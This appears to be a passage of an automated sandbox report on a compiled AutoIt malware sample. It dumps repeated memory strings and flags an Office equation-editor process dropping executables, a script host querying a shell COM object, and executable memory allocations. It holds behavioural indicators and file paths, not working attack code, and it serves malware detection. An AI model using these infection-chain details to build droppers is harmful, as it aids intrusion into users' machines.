              Source: outvaunts.exe, 00000006.00000002.461070341.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_bcb0a91b-0
              Source: outvaunts.exe, 00000007.00000002.462634381.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_270951dc-5
              Source: outvaunts.exe, 00000007.00000002.462634381.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_acf1e28e-2
              Source: outvaunts.exe, 00000008.00000002.464279743.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c679bab2-0
              Source: outvaunts.exe, 00000008.00000002.464279743.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c7ca583d-c
              Source: outvaunts.exe, 00000009.00000002.466798345.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5eef1ad1-3
              Source: outvaunts.exe, 00000009.00000002.466798345.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0933ed2f-3
              Source: outvaunts.exe, 0000000A.00000002.468525996.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4966de35-5
              Source: outvaunts.exe, 0000000A.00000002.468525996.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_919536a6-c
              Source: outvaunts.exe, 0000000B.00000002.470454898.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7b741f2c-7
              Source: outvaunts.exe, 0000000B.00000002.470454898.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_3d1ebab6-f
              Source: outvaunts.exe, 0000000C.00000002.472756576.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_95e17d0d-8
              Source: outvaunts.exe, 0000000C.00000002.472756576.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_2cdba31f-d
              Source: outvaunts.exe, 0000000D.00000002.474327698.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ff861086-9
              Source: outvaunts.exe, 0000000D.00000002.474327698.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e3e66d5e-4
              Source: outvaunts.exe, 0000000E.00000002.476092526.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2f3cca69-b
              Source: outvaunts.exe, 0000000E.00000002.476092526.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_04bd4463-5
              Source: outvaunts.exe, 0000000F.00000002.477757630.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8596e6fc-6
              Source: outvaunts.exe, 0000000F.00000002.477757630.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_ca1ecc1b-2
              Source: outvaunts.exe, 00000010.00000002.480442740.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_da40eb62-9
              Source: outvaunts.exe, 00000010.00000002.480442740.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c3c3e676-3
              Source: outvaunts.exe, 00000012.00000002.484513760.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7a8c59df-5
              Source: outvaunts.exe, 00000012.00000002.484513760.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_814fd810-f
              Source: outvaunts.exe, 00000013.00000002.484941086.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9f7918ba-3
              Source: outvaunts.exe, 00000013.00000002.484941086.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_288c61a9-9
              Source: outvaunts.exe, 00000014.00000002.487098685.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ef112b00-e
              Source: outvaunts.exe, 00000014.00000002.487098685.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_30a9893f-d
              Source: outvaunts.exe, 00000015.00000002.486670409.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_79cae40a-6
              Source: outvaunts.exe, 00000015.00000002.486670409.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0d466b51-3
              Source: outvaunts.exe, 00000016.00000002.489048774.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7eedd7c9-4
              Source: outvaunts.exe, 00000016.00000002.489048774.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e1ec42da-0
              Source: outvaunts.exe, 00000017.00000002.489485579.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_554cc1ee-f
              Source: outvaunts.exe, 00000017.00000002.489485579.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_35a43c72-d
              Source: outvaunts.exe, 00000018.00000002.490993278.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_25a5e118-b
              Source: outvaunts.exe, 00000018.00000002.490993278.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0d6a1c6d-1
              Source: outvaunts.exe, 00000019.00000002.491266940.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_151e4d99-a
              Source: outvaunts.exe, 00000019.00000002.491266940.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_6c79bfb7-3
              Source: outvaunts.exe, 0000001A.00000002.493321448.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_02635927-7
              Source: outvaunts.exe, 0000001A.00000002.493321448.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_08900555-c
              Source: outvaunts.exe, 0000001B.00000002.493497658.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_88a6d2e3-4
              Source: outvaunts.exe, 0000001B.00000002.493497658.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_fd997616-c
              Source: outvaunts.exe, 0000001C.00000002.495654384.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0895ba25-3
              Source: outvaunts.exe, 0000001C.00000002.495654384.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_ed5e809b-9
              Source: outvaunts.exe, 0000001D.00000002.495734635.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_01d86f9b-2
              Source: outvaunts.exe, 0000001D.00000002.495734635.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f255c409-8
              Source: outvaunts.exe, 0000001E.00000002.497654878.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e7ab7ca2-c
              Source: outvaunts.exe, 0000001E.00000002.497654878.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_3f2aed98-3
              Source: outvaunts.exe, 0000001F.00000002.497450317.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a3ae254f-d
              Source: outvaunts.exe, 0000001F.00000002.497450317.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_1b46b295-6
              Source: outvaunts.exe, 00000020.00000002.500314849.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5d59e99a-9
              Source: outvaunts.exe, 00000020.00000002.500314849.0000000001414000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d8f236b7-4
              Office equation editor drops PE file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Temp\kudo.exeJump to dropped file
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeMemory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00803633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,5_2_00803633
